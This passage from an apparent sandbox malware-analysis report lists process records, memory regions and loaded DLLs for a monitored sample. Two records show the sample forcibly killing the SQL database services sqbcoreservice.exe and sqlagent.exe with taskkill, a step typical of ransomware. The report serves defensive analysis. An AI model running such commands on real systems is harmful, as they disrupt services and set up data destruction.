0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2426 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2427 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 183 os_tid = 0x8b8 Thread: id = 213 os_tid = 0xb2c Thread: id = 217 os_tid = 0x3d8 Thread: id = 220 os_tid = 0x510 Thread: id = 221 os_tid = 0x6e0 Process: id = "28" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0xc51c000" os_pid = "0x920" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM sqbcoreservice.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2052 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2053 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2054 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2055 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2056 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2057 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2058 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2059 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2060 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2061 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2062 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2063 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2064 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2065 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2066 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2458 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2459 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2460 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2461 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2462 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2463 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2464 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2465 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2466 start_va = 0x190000 end_va = 0x24ffff entry_point = 0x190000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2467 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2468 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2469 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2470 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2471 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2472 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 2473 start_va = 0x1b90000 end_va = 0x1b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 2474 start_va = 0x1bd0000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 2475 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2476 start_va = 0x1d30000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 2477 start_va = 0x1ee0000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 2478 start_va = 0x1f60000 end_va = 0x222efff entry_point = 0x1f60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2479 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2480 start_va = 0x2320000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2481 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2482 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2483 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2484 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2485 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2486 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2487 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2488 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2489 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2490 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2491 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2492 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2493 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2494 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2495 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2496 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2497 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2498 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2499 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2500 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2501 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2502 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2503 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2504 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2505 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2506 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2507 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2508 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2509 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2510 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2511 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2512 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2513 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2514 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2515 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2516 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2517 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2518 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2519 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2520 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 192 os_tid = 0x914 Thread: id = 222 os_tid = 0x7f0 Thread: id = 228 os_tid = 0xb0c Thread: id = 231 os_tid = 0xbe8 Thread: id = 232 os_tid = 0x628 Process: id = "29" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x2b63c000" os_pid = "0x944" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM sqlagent.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2067 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2068 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2069 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2070 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2071 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2072 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2073 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2074 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2075 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2076 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2077 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2078 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2079 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2080 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2081 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2521 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2522 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2523 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2524 start_va = 0x140000 end_va = 0x146fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2525 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2526 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 2527 start_va = 0x360000 end_va = 0x363fff entry_point = 0x360000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2528 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2529 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2530 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2531 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2532 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2533 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2534 start_va = 0x570000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2535 start_va = 0x700000 end_va = 0x1afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2536 start_va = 0x1b00000 end_va = 0x1bbffff entry_point = 0x1b00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2537 start_va = 0x1bd0000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 2538 start_va = 0x1cd0000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 2539 start_va = 0x1d90000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 2540 start_va = 0x1e10000 end_va = 0x20defff entry_point = 0x1e10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2541 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 2542 start_va = 0x2210000 end_va = 0x228ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2543 start_va = 0x22c0000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 2544 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2545 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2546 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2547 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2548 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2549 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2550 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2551 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2552 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2553 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2554 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2555 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2556 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2557 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2558 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2559 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2560 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2561 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2562 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2563 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2564 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2565 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2566 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: 